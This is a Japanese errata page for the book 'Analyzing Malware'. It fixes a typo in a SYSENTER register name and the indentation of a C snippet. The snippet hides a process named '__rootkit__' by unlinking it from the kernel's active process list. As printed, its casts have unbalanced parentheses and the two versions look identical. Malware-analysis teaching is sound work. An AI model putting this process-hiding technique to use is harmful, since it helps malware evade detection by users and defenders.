『アナライジング・マルウェア』の正誤表です。
P221の下から9行目
誤
正
補足
IA32_SYSENTER__CS+8の値を...
IA32_SYSENTER_CS+8の値を...
アンダーバーが2つになってしまっている。
P225の下記コード
誤
正
補足
eproc = FindProcessByName("__rootkit__");
if(eproc != 0){
//link exchange
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
*((DWORD) *)plist_active_procs->Blink)
= (DWORD) plist_active_procs->Flink;
*((DWORD) *)plist_active_procs->Flink+1)
= (DWORD) plist_active_procs->Blink;
eproc = FindProcessByName("__rootkit__");
if(eproc != 0){
//link exchange
plist_active_procs = (LIST_ENTRY *) (eproc+FLINKOFFSET);
*((DWORD) *)plist_active_procs->Blink)
= (DWORD) plist_active_procs->Flink;
*((DWORD) *)plist_active_procs->Flink+1)
= (DWORD) plist_active_procs->Blink;
インデントにタブが一つ足りない。